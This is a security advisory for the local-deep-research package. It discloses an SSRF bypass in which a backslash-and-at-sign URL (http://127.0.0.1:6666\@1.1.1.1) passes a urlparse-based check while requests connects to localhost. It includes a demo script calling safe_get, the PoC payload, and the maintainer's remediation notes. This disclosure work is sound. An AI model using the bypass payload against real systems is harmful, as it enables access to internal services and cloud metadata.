local-deep-research has an SSRF bypass in `safe_get`
🔗 CVE IDs covered (1)
📋 Description
Summary
The URL checking logic in local-deep-research has a logical flaw that could be bypassed by attackers, leading to SSRF attacks.
Details
The current project uses validate_url to validate the input URL. The main logic is to perform security checks on the host portion of the URL extracted by urlparse to prevent SSRF attacks.
However, there are indeed differences in parsing between urlparse and the library that actually sends the request. For example, in safe_get, validate_url is first used to perform an SSRF check, and then requests.get is used to send the actual request.
The core issue: urlparse() and requests disagree on which host a URL like http://127.0.0.1:6666\@1.1.1.1 points to:
- urlparse() treats \ as a regular character and @ as the userinfo-host delimiter, so it extracts hostname as
1.1.1.1(public) - requests treats \ as a path character, connecting to
127.0.0.1(internal)
Below is a test code I wrote following the code.
#!/usr/bin/env python3
"""Standalone demo: import project via absolute path and call safe_get."""
from __future__ import annotations
import importlib.util
import enum
import sys
import types
from pathlib import Path
# Hardcoded absolute path to the project's "src" directory.
SRC_ROOT = Path(
r"d:\BaiduNetdiskDownload\local-deep-research-main\local-deep-research-main\src"
)
# Python 3.10 compatibility:
# project constants import StrEnum (available in Python 3.11+).
if not hasattr(enum, "StrEnum"):
class _CompatStrEnum(str, enum.Enum):
pass
enum.StrEnum = _CompatStrEnum # type: ignore[attr-defined]
def _load_safe_get():
"""Load safe_get directly from file, bypassing package __init__ imports."""
ldr_pkg_name = "local_deep_research"
security_pkg_name = "local_deep_research.security"
# Build lightweight package modules so relative imports in safe_requests.py
# resolve without executing package __init__.py files.
if ldr_pkg_name not in sys.modules:
ldr_pkg = types.ModuleType(ldr_pkg_name)
ldr_pkg.__path__ = [str(SRC_ROOT / "local_deep_research")] # type: ignore[attr-defined]
sys.modules[ldr_pkg_name] = ldr_pkg
if security_pkg_name not in sys.modules:
security_pkg = types.ModuleType(security_pkg_name)
security_pkg.__path__ = [str(SRC_ROOT / "local_deep_research" / "security")] # type: ignore[attr-defined]
sys.modules[security_pkg_name] = security_pkg
module_name = "local_deep_research.security.safe_requests"
module_path = SRC_ROOT / "local_deep_research" / "security" / "safe_requests.py"
spec = importlib.util.spec_from_file_location(module_name, module_path)
if spec is None or spec.loader is None:
raise ImportError(f"Cannot load module from {module_path}")
module = importlib.util.module_from_spec(spec)
sys.modules[module_name] = module
spec.loader.exec_module(module)
return module.safe_get
safe_get = _load_safe_get()
def main() -> None:
# Hardcoded URL for demonstration.
url = "http://127.0.0.1:6666"
# url = "http://127.0.0.1:6666\@1.1.1.1"
safe_get(url, timeout=15)
if __name__ == "__main__":
main()
When an attacker uses http://127.0.0.1:6666/, the existing detection logic can detect that this is an internal network address and block it.
However, when an attacker uses http://127.0.0.1:6666\@1.1.1.1, the detection logic resolves the host to 1.1.1.1, which is a public IP address, thus passing the verification. But in the actual request process, this URL is forwarded by requests.get to http://127.0.0.1:6666, bypassing the detection and achieving an SSRF attack.
PoC
http://127.0.0.1:6666\@1.1.1.1
Impact
SSRF
Maintainer note (2026-05-15)
Thanks @Fushuling and @RacerZ-fighting for the detailed report. The remediation
spans four PRs, all merged to main and shipped in v1.6.10:
#3873 (merged 2026-05-08) — the load-bearing fix for the parser-differential bypass:
- New
RFC_FORBIDDEN_URL_CHARS_REinsecurity/ssrf_validator.pyrejects URLs containing backslash, ASCII control bytes, or whitespace — RFC 3986 forbids these and their presence signals a parser-differential attempt. - Host extraction switched from
urllib.parse.urlparse(url).hostnametourllib3.util.parse_url(url).host.urllib3is the parserrequestsuses internally, so the validator and the HTTP client now agree on the destination by construction — closing the\@divergence that drove the PoC. - Same two-layer defence applied to
NotificationURLValidator.validate_service_url. - 53 new tests across
test_ssrf_validator.py,test_notification_validator.py,test_safe_requests.py, andtest_ssrf_redirect_bypass.py, including the advisory PoChttp://127.0.0.1:6666\@1.1.1.1and the post-prepare canonical formhttp://127.0.0.1:6666/%5C@1.1.1.1.
#3882 (merged 2026-05-08) — hardens the metadata-IP block and redacts userinfo from log output so rejected URLs don't leak credentials to logs.
#3889 (merged 2026-05-09) — locks in real-world URL fixtures and behavior invariants from #3873/#3882 as regression tests.
#3932 (merged 2026-05-10) — blocks IPv6 transition prefixes (2002::/16
6to4, 64:ff9b::/96 NAT64, 2001::/32 Teredo, 100::/64 discard) so private
IPv4 destinations cannot be reached via an IPv6-wrapped form. NAT64 has an
operator opt-in (LDR_SECURITY_ALLOW_NAT64=true) for IPv6-only deployments,
but cloud metadata IPs remain blocked regardless.
Affected versions
- The specific parser-differential bypass described above exists from
v1.3.0 (when
validate_urlwas first introduced) through v1.6.9. The validator usedurlparse(url).hostnamefor that entire span. - Versions before v1.3.0 had no SSRF validator at all — requests went
directly to
requests.get()without any host check. Those versions are vulnerable to SSRF via this URL and any other internal address; the parser-differential trick is unnecessary.
In both cases the remediation is the same: upgrade to v1.6.10 or later.
🎯 Affected products1
- pip/local-deep-research:< 1.6.10